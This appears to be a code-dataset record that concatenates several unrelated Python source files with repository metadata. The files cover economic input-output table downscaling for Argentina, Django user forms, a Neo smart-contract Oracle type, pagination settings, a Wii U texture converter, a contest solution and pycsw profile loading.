2022-01-10T06:49:01.000Z
|
import os,sys
import pandas as pd
import numpy as np
import subprocess
from tqdm import tqdm
from ras_method import ras_method
import warnings
warnings.filterwarnings('ignore')
def est_trade_value(x,output_new,sector):
"""
Function to estimate the trade value between two sectors
"""
    if (sector != 'other1') and (sector != 'other2'):
sec_output = output_new.sum(axis=1).loc[output_new.sum(axis=1).index.get_level_values(1) == sector].reset_index()
else:
sec_output = output_new.sum(axis=1).loc[output_new.sum(axis=1).index.get_level_values(1) == 'IMP'].reset_index()
x['gdp'] = x.gdp*min(sec_output.loc[sec_output.region==x.reg1].values[0][2],sec_output.loc[sec_output.region==x.reg2].values[0][2])
return x
def estimate(table='INDEC',year=2015,print_output=False,print_progress=True):
"""
Function to create a province-level MRIO table, based on a national IO table. The default is the INDEC table.
"""
data_path = os.path.join('..','data')
# load sector data
sectors = list(pd.read_excel(os.path.join(data_path,'other_sources',
'industry_high_level_classification.xlsx'))['SEC_CODE'].values)
# load provincial mappers
reg_mapper = pd.read_excel(os.path.join(data_path,'INDEC','sh_cou_06_16.xls'),sheet_name='reg_mapper',header=None).iloc[:,:2]
reg_mapper = dict(zip(reg_mapper[0],reg_mapper[1]))
# load provincial data
prov_data = pd.read_excel(os.path.join(data_path,'INDEC','PIB_provincial_06_17.xls'),sheet_name='VBP',
skiprows=3,index_col=[0],header=[0],nrows=71)
prov_data = prov_data.loc[[x.isupper() for x in prov_data.index],:]
prov_data.columns = [x.replace(' ','_') for x in ['Ciudad de Buenos Aires', 'Buenos Aires', 'Catamarca', 'Cordoba',
'Corrientes', 'Chaco', 'Chubut', 'Entre Rios', 'Formosa', 'Jujuy',
'La Pampa', 'La Rioja', 'Mendoza', 'Misiones', 'Neuquen', 'Rio Negro',
'Salta', 'San Juan', 'San Luis', 'Santa Cruz', 'Santa Fe',
'Santiago del Estero', 'Tucuman', 'Tierra del Fuego',
'No distribuido', 'Total']]
region_names = list(prov_data.columns)[:-2]
prov_data.index = sectors+['TOTAL']
prov_data = prov_data.replace(0, 1)
### Create proxy data for first iteration
sectors+['other1','other2']
# proxy level 2
proxy_reg_arg = pd.DataFrame(prov_data.iloc[-1,:24]/prov_data.iloc[-1,:24].sum()).reset_index()
proxy_reg_arg['year'] = 2016
proxy_reg_arg = proxy_reg_arg[['year','index','TOTAL']]
proxy_reg_arg.columns = ['year','id','gdp']
proxy_reg_arg.to_csv(os.path.join('..','mrio_downscaling','proxy_reg_arg.csv'),index=False)
# proxy level 4
for iter_,sector in enumerate(sectors+['other1','other2']):
if (sector != 'other1') & (sector != 'other2'):
proxy_sector = pd.DataFrame(prov_data.iloc[iter_,:24]/prov_data.iloc[iter_,:24].sum()).reset_index()
proxy_sector['year'] = 2016
proxy_sector['sector'] = 'sec{}'.format(sector)
proxy_sector = proxy_sector[['year','sector','index',sector]]
proxy_sector.columns = ['year','sector','region','gdp']
proxy_sector.to_csv(os.path.join('..','mrio_downscaling','proxy_sec{}.csv'.format(sector)),index=False)
else:
proxy_sector = pd.DataFrame(prov_data.iloc[-1,:24]/prov_data.iloc[-1,:24].sum()).reset_index()
proxy_sector['year'] = 2016
proxy_sector['sector'] = sector+'1'
proxy_sector = proxy_sector[['year','sector','index','TOTAL']]
proxy_sector.columns = ['year','sector','region','gdp']
proxy_sector.to_csv(os.path.join('..','mrio_downscaling','proxy_{}.csv'.format(sector)),index=False)
# proxy level 18
def change_name(x):
if x in sectors:
return 'sec'+x
elif x == 'other1':
return 'other11'
else:
return 'other21'
mi_index = pd.MultiIndex.from_product([sectors+['other1','other2'], region_names, sectors+['other1','other2'], region_names],
names=['sec1', 'reg1','sec2','reg2'])
for iter_,sector in enumerate(sectors+['other1','other2']):
if (sector != 'other1') & (sector != 'other2'):
proxy_trade = pd.DataFrame(columns=['year','gdp'],index= mi_index).reset_index()
proxy_trade['year'] = 2016
proxy_trade['gdp'] = 0
proxy_trade = proxy_trade.query("reg1 != reg2")
proxy_trade = proxy_trade.loc[proxy_trade.sec1 == sector]
proxy_trade['sec1'] = proxy_trade.sec1.apply(change_name)
proxy_trade['sec2'] = proxy_trade.sec2.apply(change_name)
proxy_trade = proxy_trade[['year','sec1','reg1','sec2','reg2','gdp']]
proxy_trade.columns = ['year','sector','region','sector','region','gdp']
proxy_trade.to_csv(os.path.join('..','mrio_downscaling','proxy_trade_sec{}.csv'.format(sector)),index=False)
else:
proxy_trade = pd.DataFrame(columns=['year','gdp'],index= mi_index).reset_index()
proxy_trade['year'] = 2016
proxy_trade['gdp'] = 0
proxy_trade = proxy_trade.query("reg1 != reg2")
proxy_trade = proxy_trade.loc[proxy_trade.sec1 == sector]
proxy_trade['sec1'] = proxy_trade.sec1.apply(change_name)
proxy_trade['sec2'] = proxy_trade.sec2.apply(change_name)
proxy_trade = proxy_trade[['year','sec1','reg1','sec2','reg2','gdp']]
proxy_trade.columns = ['year','sector','region','sector','region','gdp']
proxy_trade.to_csv(os.path.join('..','mrio_downscaling','proxy_trade_{}.csv'.format(sector)),index=False)
"""
Create first version of MRIO for Argentina, without trade
"""
### save basetable for disaggregation using the specific source:
basetable = pd.read_csv(os.path.join(data_path,'national_tables','{}_{}.csv'.format(year,table)),index_col=[0])
basetable.to_csv(os.path.join('..','mrio_downscaling','basetable.csv'),header=False,index=False)
### run libmrio
p = subprocess.Popen([r'..\mrio_downscaling\mrio_disaggregate', 'settings_notrade.yml'],
cwd=os.path.join('..','mrio_downscaling'))
p.wait()
### load data and reorder
region_names_list = [item for sublist in [[x]*(len(sectors)+2) for x in region_names]
for item in sublist]
rows = ([x for x in sectors+['VA','IMP']])*len(region_names)
cols = ([x for x in sectors+['FD','EXP']])*len(region_names)
index_mi = pd.MultiIndex.from_arrays([region_names_list, rows], names=('region', 'row'))
column_mi = pd.MultiIndex.from_arrays([region_names_list, cols], names=('region', 'col'))
MRIO = pd.read_csv(os.path.join('..','mrio_downscaling','output1.csv'),header=None,index_col=None)
MRIO.index = index_mi
MRIO.columns = column_mi
# create predefined index and col, which is easier to read
sector_only = [x for x in sectors]*len(region_names)
col_only = ['FD']*len(region_names)
region_col = [item for sublist in [[x]*len(sectors) for x in region_names] for item in sublist] + \
[item for sublist in [[x]*1 for x in region_names] for item in sublist]
column_mi_reorder = pd.MultiIndex.from_arrays(
[region_col, sector_only+col_only], names=('region', 'col'))
# sum va and imports
valueA = MRIO.xs('VA', level=1, axis=0).sum(axis=0)
valueA.drop('FD', level=1,axis=0,inplace=True)
valueA.drop('EXP', level=1,axis=0,inplace=True)
imports = MRIO.xs('IMP', level=1, axis=0).sum(axis=0)
imports.drop('FD', level=1,axis=0,inplace=True)
imports.drop('EXP', level=1,axis=0,inplace=True)
FinalD = MRIO.xs('FD', level=1, axis=1).sum(axis=1)
FinalD.drop('VA', level=1,axis=0,inplace=True)
FinalD.drop('IMP', level=1,axis=0,inplace=True)
Export = MRIO.xs('EXP', level=1, axis=1).sum(axis=1)
Export.drop('VA', level=1,axis=0,inplace=True)
Export.drop('IMP', level=1,axis=0,inplace=True)
output_new = MRIO.copy()
"""
Balance first MRIO version
"""
# convert to numpy matrix
X0 = MRIO.values  # .as_matrix() was removed in recent pandas; .values is equivalent here
# get sum of rows and columns
u = X0.sum(axis=1)
v = X0.sum(axis=0)
# and only keep T
v[:(len(u)-2)] = u[:-2]
# apply RAS method to rebalance the table
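# RAS is a biproportional (iterative proportional fitting) procedure: it
# alternately rescales the rows of X0 towards the target row totals u and the
# columns towards the target column totals v, repeating until the largest
# deviation drops below eps. The structure of the unbalanced table is kept
# while the MRIO accounting identities are restored.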
X1 = ras_method(X0, u, v, eps=1e-5,print_out=print_output)
#translate to pandas dataframe
output_new = pd.DataFrame(X1)
output_new.index = index_mi
output_new.columns = column_mi
if print_progress:
print('NOTE : Balanced MRIO table without trade finished using {} data'.format(table))
"""
Create second version of MRIO for Argentina, with trade
"""
### Load OD matrix
od_matrix_total = pd.DataFrame(pd.read_excel(os.path.join(data_path,'OD_data','province_ods.xlsx'),
sheet_name='total',index_col=[0,1],usecols =[0,1,2,3,4,5,6,7])).unstack(1).fillna(0)
od_matrix_total.columns.set_levels(['A','G','C','D','B','I'],level=0,inplace=True)
od_matrix_total.index = od_matrix_total.index.map(reg_mapper)
od_matrix_total = od_matrix_total.stack(0)
od_matrix_total.columns = od_matrix_total.columns.map(reg_mapper)
od_matrix_total = od_matrix_total.swaplevel(i=-2, j=-1, axis=0)
od_matrix_total = od_matrix_total.loc[:, od_matrix_total.columns.notnull()]
### Create proxy data
# proxy level 14
mi_index = pd.MultiIndex.from_product([sectors+['other1','other2'], region_names, region_names],
names=['sec1', 'reg1','reg2'])
for iter_,sector in enumerate((sectors+['other1','other2'])):
if sector in ['A','G','C','D','B','I']:
proxy_trade = (od_matrix_total.sum(level=1).divide(od_matrix_total.sum(level=1).sum(axis=1),axis='rows')).stack(0).reset_index()
proxy_trade.columns = ['reg1','reg2','gdp']
proxy_trade['year'] = 2016
proxy_trade = proxy_trade.apply(lambda x: est_trade_value(x,output_new,sector),axis=1)
proxy_trade['sec1'] = 'sec{}'.format(sector)
proxy_trade = proxy_trade[['year','sec1','reg1','reg2','gdp']]
proxy_trade.columns = ['year','sector','region','region','gdp']
proxy_trade.to_csv(os.path.join('..','mrio_downscaling','proxy_trade14_sec{}.csv'.format(sector)),index=False)
elif (sector != 'other1') & (sector != 'other2') & (sector not in ['A','G','C','D','B','I']): # & (sector not in ['L','M','N','O','P']):
proxy_trade = (od_matrix_total.sum(level=1).divide(od_matrix_total.sum(level=1).sum(axis=1),axis='rows')).stack(0).reset_index()
#proxy_trade[0].loc[(proxy_trade.origin_province == proxy_trade.destination_province)] = 0.9
#proxy_trade[0].loc[~(proxy_trade.origin_province == proxy_trade.destination_province)] = 0.1
proxy_trade.columns = ['reg1','reg2','gdp']
proxy_trade['year'] = 2016
proxy_trade = proxy_trade.apply(lambda x: est_trade_value(x,output_new,sector),axis=1)
proxy_trade['sec1'] = 'sec{}'.format(sector)
proxy_trade = proxy_trade[['year','sec1','reg1','reg2','gdp']]
proxy_trade.columns = ['year','sector','region','region','gdp']
proxy_trade.to_csv(os.path.join('..','mrio_downscaling','proxy_trade14_sec{}.csv'.format(sector)),index=False)
else:
proxy_trade = (od_matrix_total.sum(level=1).divide(od_matrix_total.sum(level=1).sum(axis=1),axis='rows')).stack(0).reset_index()
proxy_trade.columns = ['reg1','reg2','gdp']
proxy_trade['year'] = 2016
proxy_trade = proxy_trade.apply(lambda x: est_trade_value(x,output_new,sector),axis=1)
proxy_trade['sec1'] = sector+'1'
proxy_trade = proxy_trade[['year','sec1','reg1','reg2','gdp']]
proxy_trade.columns = ['year','sector','region','region','gdp']
proxy_trade.to_csv(os.path.join('..','mrio_downscaling','proxy_trade14_{}.csv'.format(sector)),index=False)
# proxy level 18
mi_index = pd.MultiIndex.from_product([sectors+['other1','other2'], region_names, sectors+['other1','other2'], region_names],
names=['sec1', 'reg1','sec2','reg2'])
for iter_,sector in enumerate((sectors+['other1','other2'])):
if (sector != 'other1') & (sector != 'other2'):
proxy_trade = pd.DataFrame(columns=['year','gdp'],index= mi_index).reset_index()
proxy_trade['year'] = 2016
proxy_trade['gdp'] = 0
proxy_trade = proxy_trade.query("reg1 != reg2")
proxy_trade = proxy_trade.loc[proxy_trade.sec1 == sector]
proxy_trade = proxy_trade.loc[proxy_trade.sec2.isin(['L','M','N','O','P'])]
proxy_trade['sec1'] = proxy_trade.sec1.apply(change_name)
proxy_trade['sec2'] = proxy_trade.sec2.apply(change_name)
proxy_trade = proxy_trade.query("reg1 == reg2")
proxy_trade = proxy_trade[['year','sec1','reg1','sec2','reg2','gdp']]
proxy_trade.columns = ['year','sector','region','sector','region','gdp']
proxy_trade.to_csv(os.path.join('..','mrio_downscaling','proxy_trade_sec{}.csv'.format(sector)),index=False)
else:
proxy_trade = pd.DataFrame(columns=['year','gdp'],index= mi_index).reset_index()
proxy_trade['year'] = 2016
proxy_trade['gdp'] = 0
proxy_trade = proxy_trade.query("reg1 != reg2")
proxy_trade = proxy_trade.loc[proxy_trade.sec1 == sector]
proxy_trade = proxy_trade.loc[proxy_trade.sec2.isin(['L','M','N','O','P'])]
proxy_trade['sec1'] = proxy_trade.sec1.apply(change_name)
proxy_trade['sec2'] = proxy_trade.sec2.apply(change_name)
proxy_trade = proxy_trade.query("reg1 == reg2")
proxy_trade = proxy_trade[['year','sec1','reg1','sec2','reg2','gdp']]
proxy_trade.columns = ['year','sector','region','sector','region','gdp']
proxy_trade.to_csv(os.path.join('..','mrio_downscaling','proxy_trade_{}.csv'.format(sector)),index=False)
### run libmrio
p = subprocess.Popen([r'..\mrio_downscaling\mrio_disaggregate', 'settings_trade.yml'],
cwd=os.path.join('..','mrio_downscaling'))
p.wait()
# load data and reorder
region_names_list = [item for sublist in [[x]*(len(sectors)+2) for x in region_names]
for item in sublist]
rows = ([x for x in sectors+['VA','IMP']])*len(region_names)
cols = ([x for x in sectors+['FD','EXP']])*len(region_names)
index_mi = pd.MultiIndex.from_arrays([region_names_list, rows], names=('region', 'row'))
column_mi = pd.MultiIndex.from_arrays([region_names_list, cols], names=('region', 'col'))
MRIO = pd.read_csv(os.path.join('..','mrio_downscaling','output2.csv'),header=None,index_col=None)
MRIO.index = index_mi
MRIO.columns = column_mi
# create predefined index and col, which is easier to read
sector_only = [x for x in sectors]*len(region_names)
col_only = ['FD','EXP']*len(region_names)
region_col = [item for sublist in [[x]*len(sectors) for x in region_names] for item in sublist] + \
[item for sublist in [[x]*2 for x in region_names] for item in sublist]
column_mi_reorder = pd.MultiIndex.from_arrays(
[region_col, sector_only+col_only], names=('region', 'col'))
# sum va and imports
valueA = pd.DataFrame(MRIO.loc[MRIO.index.get_level_values(1) == 'VA'].sum(axis='index'))
valueA.columns = pd.MultiIndex.from_product([['Total'],['ValueA']],names=['region','row'])
IMP = pd.DataFrame(MRIO.loc[MRIO.index.get_level_values(1) == 'IMP'].sum(axis='index'))
IMP.columns = pd.MultiIndex.from_product([['Total'],['IMP']],names=['region','row'])
output = pd.concat([MRIO.loc[~MRIO.index.get_level_values(1).isin(['FD','EXP'])]])
output = output.drop(['VA','IMP'], level=1)
output = pd.concat([output,valueA.T,IMP.T])
output = output.reindex(column_mi_reorder, axis='columns')
mrio_arg = ras_method(np.array(output).T,np.array(list(output.sum(axis=1))[:384]+list(output.sum(axis=0)[-48:])),
np.array(list(output.sum(axis=1))[:384]+[output.loc[('Total','ValueA'),:].sum(),output.loc[('Total','IMP'),:].sum()]),
eps=1e-3,print_out=print_output)
mrio_argentina = pd.DataFrame(mrio_arg.T,index=output.index,columns=output.columns)
mrio_argentina.to_csv(os.path.join(data_path,'MRIO','MRIO_Argentina_{}_{}.csv'.format(table,year)))
if print_progress:
print('NOTE : Balanced MRIO table with trade finished using {} data'.format(table))
def prepare_table_mria(table='INDEC',year='2015',print_output=True):
"""
Convert MRIO table to an excel file in which all elements of the table are disaggregated.
"""
data_path = os.path.join('..','data')
# load table
MRIO = pd.read_csv(os.path.join(data_path,'MRIO','MRIO_Argentina_{}_{}.csv'.format(table,year)),index_col=[0,1],header=[0,1])
Xnew = MRIO.copy()
Xnew = Xnew+1e-6
# write to excel
writer = pd.ExcelWriter(os.path.join(data_path,'MRIO', 'mrio_argentina_disaggregated_{}_{}.xlsx'.format(table,year)))
# write T
df_T = Xnew.iloc[:384, :384]
df_T.columns = df_T.columns.droplevel()
df_labels_T = pd.DataFrame(df_T.reset_index()[['region', 'row']])
df_T.reset_index(inplace=True, drop=True)
df_T.to_excel(writer, 'T', index=False, header=False)
df_labels_T.to_excel(writer, 'labels_T', index=False, header=False)
# write FD
df_FD = Xnew.iloc[:384, 384:].iloc[:, Xnew.iloc[:384, 384:].columns.get_level_values(1)=='FD']
df_labels_FD = pd.DataFrame(list(df_FD.columns))
df_FD.columns = df_FD.columns.droplevel()
df_FD.reset_index(inplace=True, drop=True)
df_FD.to_excel(writer, 'FD', index=False, header=False)
df_labels_FD.to_excel(writer, 'labels_FD', index=False, header=False)
# write ExpROW
df_ExpROW = pd.DataFrame(Xnew.iloc[:384, 384:].iloc[:, Xnew.iloc[:384, 384:].columns.get_level_values(1)=='EXP'].sum(axis=1))
df_labels_ExpROW = pd.DataFrame(['Export'])
df_ExpROW.reset_index(inplace=True, drop=True)
df_ExpROW.to_excel(writer, 'ExpROW', index=False, header=False)
df_labels_ExpROW.reset_index(inplace=True, drop=True)
df_labels_ExpROW.columns = ['Export']
df_labels_ExpROW.to_excel(writer, 'labels_ExpROW', index=False, header=False)
# write VA
df_VA = pd.DataFrame(Xnew.iloc[384:, :409].T[('Total', 'ValueA')])
df_VA.columns = ['VA']
df_VA['imports'] = pd.DataFrame(Xnew.iloc[384:, :].T[('Total', 'IMP')])
df_VA.reset_index(inplace=True, drop=True)
df_VA.to_excel(writer, 'VA', index=False, header=False)
df_labels_VA = pd.DataFrame(['Import', 'VA']).T
df_labels_VA.to_excel(writer, 'labels_VA', index=False, header=False)
# save excel
writer.save()
if print_output:
print('NOTE : MRIO table ready to use for MRIA model using {} data'.format(table))
if __name__ == "__main__":
estimate(table='GTAP',year='2014',print_output=True)
prepare_table_mria(table='GTAP',year='2014',print_output=True)
| 49.24557
| 154
| 0.635359
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 4,979
| 0.255963
|
421c88021499b88620b09442779453fef21cf565
| 1,212
|
py
|
Python
|
task_manager/users/forms.py
|
Ritesh-Aggarwal/Task-Manager-Django
|
b8f8df10b0b0a9cc9cd27346a0b5d4d5892d2f24
|
[
"MIT"
] | null | null | null |
task_manager/users/forms.py
|
Ritesh-Aggarwal/Task-Manager-Django
|
b8f8df10b0b0a9cc9cd27346a0b5d4d5892d2f24
|
[
"MIT"
] | null | null | null |
task_manager/users/forms.py
|
Ritesh-Aggarwal/Task-Manager-Django
|
b8f8df10b0b0a9cc9cd27346a0b5d4d5892d2f24
|
[
"MIT"
] | null | null | null |
from django import forms
from django.contrib.auth import get_user_model
from django.contrib.auth.forms import (
AuthenticationForm,
UserCreationForm,
UsernameField,
)
User = get_user_model()
class UserLoginForm(AuthenticationForm):
def __init__(self, *args, **kwargs):
super(UserLoginForm, self).__init__(*args, **kwargs)
username = UsernameField(widget=forms.TextInput(
attrs={'class': 'bg-gray-100 rounded-lg p-2'}))
password = forms.CharField(widget=forms.PasswordInput(
attrs={
'class': 'bg-gray-100 rounded-lg p-2',
}
))
class UserSignUpForm(UserCreationForm):
def __init__(self, *args, **kwargs):
super(UserSignUpForm, self).__init__(*args, **kwargs)
username = forms.CharField(
widget=forms.TextInput(attrs={"class": "bg-gray-100 rounded-lg p-2"})
)
password1 = forms.CharField(
widget=forms.PasswordInput(
attrs={
"class": "bg-gray-100 rounded-lg p-2",
}
)
)
password2 = forms.CharField(
widget=forms.PasswordInput(
attrs={
"class": "bg-gray-100 rounded-lg p-2",
}
)
)
| 26.347826
| 77
| 0.605611
| 1,002
| 0.826733
| 0
| 0
| 0
| 0
| 0
| 0
| 175
| 0.144389
|
421cd1f840cd074e3eb92df46eaaf5c4a3768113
| 1,891
|
py
|
Python
|
boa3/model/builtin/interop/oracle/oracletype.py
|
hal0x2328/neo3-boa
|
6825a3533384cb01660773050719402a9703065b
|
[
"Apache-2.0"
] | 25
|
2020-07-22T19:37:43.000Z
|
2022-03-08T03:23:55.000Z
|
boa3/model/builtin/interop/oracle/oracletype.py
|
hal0x2328/neo3-boa
|
6825a3533384cb01660773050719402a9703065b
|
[
"Apache-2.0"
] | 419
|
2020-04-23T17:48:14.000Z
|
2022-03-31T13:17:45.000Z
|
boa3/model/builtin/interop/oracle/oracletype.py
|
hal0x2328/neo3-boa
|
6825a3533384cb01660773050719402a9703065b
|
[
"Apache-2.0"
] | 15
|
2020-05-21T21:54:24.000Z
|
2021-11-18T06:17:24.000Z
|
from __future__ import annotations
from typing import Any, Dict, Optional
from boa3.model.method import Method
from boa3.model.property import Property
from boa3.model.type.classes.classarraytype import ClassArrayType
from boa3.model.variable import Variable
class OracleType(ClassArrayType):
"""
A class used to represent the Oracle class
"""
def __init__(self):
super().__init__('Oracle')
self._variables: Dict[str, Variable] = {}
self._class_methods: Dict[str, Method] = {}
self._constructor: Optional[Method] = None
@property
def instance_variables(self) -> Dict[str, Variable]:
return self._variables.copy()
@property
def class_variables(self) -> Dict[str, Variable]:
return {}
@property
def properties(self) -> Dict[str, Property]:
return {}
@property
def static_methods(self) -> Dict[str, Method]:
return {}
@property
def class_methods(self) -> Dict[str, Method]:
# avoid recursive import
from boa3.model.builtin.interop.oracle.oraclegetpricemethod import OracleGetPriceMethod
from boa3.model.builtin.interop.oracle.oraclerequestmethod import OracleRequestMethod
if len(self._class_methods) == 0:
self._class_methods = {
'get_price': OracleGetPriceMethod(),
'request': OracleRequestMethod()
}
return self._class_methods
@property
def instance_methods(self) -> Dict[str, Method]:
return {}
def constructor_method(self) -> Optional[Method]:
return self._constructor
@classmethod
def build(cls, value: Any = None) -> OracleType:
if value is None or cls._is_type_of(value):
return _Oracle
@classmethod
def _is_type_of(cls, value: Any):
return isinstance(value, OracleType)
_Oracle = OracleType()
| 27.014286
| 95
| 0.657324
| 1,602
| 0.847171
| 0
| 0
| 1,170
| 0.61872
| 0
| 0
| 106
| 0.056055
|
42228f1e28d8899ed8da922c4eb2bd3b92ca4e69
| 191
|
py
|
Python
|
photo-hub/api/pagination.py
|
RodionChachura/photo-hub
|
20ec008076a34cb09b289fda0557e2efc7e06232
|
[
"MIT"
] | null | null | null |
photo-hub/api/pagination.py
|
RodionChachura/photo-hub
|
20ec008076a34cb09b289fda0557e2efc7e06232
|
[
"MIT"
] | null | null | null |
photo-hub/api/pagination.py
|
RodionChachura/photo-hub
|
20ec008076a34cb09b289fda0557e2efc7e06232
|
[
"MIT"
] | null | null | null |
from rest_framework.pagination import PageNumberPagination
class StandardPagination(PageNumberPagination):
page_size = 30
page_size_query_param = 'page_size'
max_page_size = 1000
| 31.833333
| 58
| 0.811518
| 131
| 0.685864
| 0
| 0
| 0
| 0
| 0
| 0
| 11
| 0.057592
|
4222c98b7de332bf9b4c1cc8bba790b9eea99314
| 1,021
|
py
|
Python
|
wiiu.py
|
RN-JK/UBIART-Texture-Decoder
|
71e190c12b1b8813dcda1f26cd115d9f89cc7619
|
[
"MIT"
] | null | null | null |
wiiu.py
|
RN-JK/UBIART-Texture-Decoder
|
71e190c12b1b8813dcda1f26cd115d9f89cc7619
|
[
"MIT"
] | null | null | null |
wiiu.py
|
RN-JK/UBIART-Texture-Decoder
|
71e190c12b1b8813dcda1f26cd115d9f89cc7619
|
[
"MIT"
] | 1
|
2021-11-29T05:57:55.000Z
|
2021-11-29T05:57:55.000Z
|
import os, glob
try:
os.mkdir("output")
except:
pass
wiiudir="input/wiiu"
try:
os.makedirs(wiiudir)
print('The directories have been made.')
input('Insert your textures in input/wiiu and then run the tool again to convert it.')
except:
pass
dir = 'input/temp'
try:
os.makedirs(dir)
except:
pass
try:
for ckdtextures in os.listdir(wiiudir):
with open(wiiudir+'/'+ckdtextures,'rb') as f:
f.read(44)
data = f.read()
dds=open('input/temp/'+ckdtextures.replace('.tga.ckd','.gtx').replace('.png.ckd','.gtx'),'wb')
dds.write(data)
dds.close()
except:
pass
try:
for gtx in os.listdir(dir):
print('making '+gtx.replace(".gtx","")+'...')
os.system("texconv2 -i input/temp/"+gtx+" -o output/"+gtx.replace(".gtx",".dds"))
except:
pass
filelist = glob.glob(os.path.join(dir, "*"))
for f in filelist:
os.remove(f)
os.rmdir(dir)
| 18.563636
| 103
| 0.5524
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 275
| 0.269344
|
4223f6babdeae509fede80d613a39bd2530fc8ee
| 470
|
py
|
Python
|
jp.atcoder/abc046/arc062_a/8984820.py
|
kagemeka/atcoder-submissions
|
91d8ad37411ea2ec582b10ba41b1e3cae01d4d6e
|
[
"MIT"
] | 1
|
2022-02-09T03:06:25.000Z
|
2022-02-09T03:06:25.000Z
|
jp.atcoder/abc046/arc062_a/8984820.py
|
kagemeka/atcoder-submissions
|
91d8ad37411ea2ec582b10ba41b1e3cae01d4d6e
|
[
"MIT"
] | 1
|
2022-02-05T22:53:18.000Z
|
2022-02-09T01:29:30.000Z
|
jp.atcoder/abc046/arc062_a/8984820.py
|
kagemeka/atcoder-submissions
|
91d8ad37411ea2ec582b10ba41b1e3cae01d4d6e
|
[
"MIT"
] | null | null | null |
import sys
n = int(sys.stdin.readline().rstrip())
ab = map(int, sys.stdin.read().split())
ab = list(zip(ab, ab))
def main():
c_a = ab[0][0]
c_b = ab[0][1]
for a, b in ab[1:]:
ratio = a / b
while c_a / c_b != ratio:
if c_a / c_b < ratio:
c_a += 1
else:
c_b += 1
ans = c_a + c_b
return ans
if __name__ == "__main__":
ans = main()
print(ans)
| 18.076923
| 40
| 0.431915
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 10
| 0.021277
|
422402f1cd18573550063c08ebfde34d14018e34
| 5,187
|
py
|
Python
|
pycsw/pycsw/plugins/profiles/profile.py
|
Geosoft2/Geosoftware-II-AALLH
|
bdb61d9a1111b9082ec2b9f309998c5f2166975e
|
[
"MIT"
] | 118
|
2015-01-07T00:24:09.000Z
|
2022-03-19T15:35:43.000Z
|
pycsw/pycsw/plugins/profiles/profile.py
|
Geosoft2/Geosoftware-II-AALLH
|
bdb61d9a1111b9082ec2b9f309998c5f2166975e
|
[
"MIT"
] | 319
|
2015-01-06T23:51:46.000Z
|
2022-03-20T11:22:57.000Z
|
pycsw/pycsw/plugins/profiles/profile.py
|
Geosoft2/Geosoftware-II-AALLH
|
bdb61d9a1111b9082ec2b9f309998c5f2166975e
|
[
"MIT"
] | 113
|
2015-01-07T00:42:23.000Z
|
2022-02-19T18:05:08.000Z
|
# -*- coding: utf-8 -*-
# =================================================================
#
# Authors: Tom Kralidis <tomkralidis@gmail.com>
# Angelos Tzotsos <tzotsos@gmail.com>
#
# Copyright (c) 2015 Tom Kralidis
# Copyright (c) 2015 Angelos Tzotsos
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation
# files (the "Software"), to deal in the Software without
# restriction, including without limitation the rights to use,
# copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following
# conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES
# OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT
# HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR
# OTHER DEALINGS IN THE SOFTWARE.
#
# =================================================================
import os
import warnings
class Profile(object):
''' base Profile class '''
def __init__(self, name, version, title, url,
namespace, typename, outputschema, prefixes, model, core_namespaces,
added_namespaces,repository):
''' Initialize profile '''
self.name = name
self.version = version
self.title = title
self.url = url
self.namespace = namespace
self.typename = typename
self.outputschema = outputschema
self.prefixes = prefixes
self.repository = repository
if 'DescribeRecord' in model['operations']:
model['operations']['DescribeRecord']['parameters']\
['typeName']['values'].append(self.typename)
model['operations']['GetRecords']['parameters']['outputSchema']\
['values'].append(self.outputschema)
model['operations']['GetRecords']['parameters']['typeNames']\
['values'].append(self.typename)
model['operations']['GetRecordById']['parameters']['outputSchema']\
['values'].append(self.outputschema)
if 'Harvest' in model['operations']:
model['operations']['Harvest']['parameters']['ResourceType']\
['values'].append(self.outputschema)
# namespaces
core_namespaces.update(added_namespaces)
# repository
model['typenames'][self.typename] = self.repository
def extend_core(self, model, namespaces, config):
''' Extend config.model and config.namespaces '''
raise NotImplementedError
def check_parameters(self):
''' Perform extra parameters checking.
Return dict with keys "locator", "code", "text" or None '''
raise NotImplementedError
def get_extendedcapabilities(self):
''' Return ExtendedCapabilities child as lxml.etree.Element '''
raise NotImplementedError
def get_schemacomponents(self):
''' Return schema components as lxml.etree.Element list '''
raise NotImplementedError
def check_getdomain(self, kvp):
'''Perform extra profile specific checks in the GetDomain request'''
raise NotImplementedError
def write_record(self, result, esn, outputschema, queryables):
''' Return csw:SearchResults child as lxml.etree.Element '''
raise NotImplementedError
def transform2dcmappings(self, queryables):
''' Transform information model mappings into csw:Record mappings '''
raise NotImplementedError
def load_profiles(path, cls, profiles):
''' load CSW profiles, return dict by class name '''
def look_for_subclass(modulename):
module = __import__(modulename)
dmod = module.__dict__
for modname in modulename.split('.')[1:]:
dmod = dmod[modname].__dict__
for key, entry in dmod.items():
if key == cls.__name__:
continue
try:
if issubclass(entry, cls):
aps['plugins'][key] = entry
except TypeError:
continue
aps = {}
aps['plugins'] = {}
aps['loaded'] = {}
for prof in profiles.split(','):
# fgdc, atom, dif, gm03 are supported in core
# no need to specify them explicitly anymore
# provide deprecation warning
# https://github.com/geopython/pycsw/issues/118
if prof in ['fgdc', 'atom', 'dif', 'gm03']:
warnings.warn('%s is now a core module, and does not need to be'
' specified explicitly. So you can remove %s from '
'server.profiles' % (prof, prof))
else:
modulename='%s.%s.%s' % (path.replace(os.sep, '.'), prof, prof)
look_for_subclass(modulename)
return aps
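# Illustrative usage sketch (not part of the original module): the plugin path
# and the 'apiso' profile name are examples only, not values taken from this file.
if __name__ == '__main__':
    aps = load_profiles(os.path.join('pycsw', 'plugins', 'profiles'), Profile, 'apiso')
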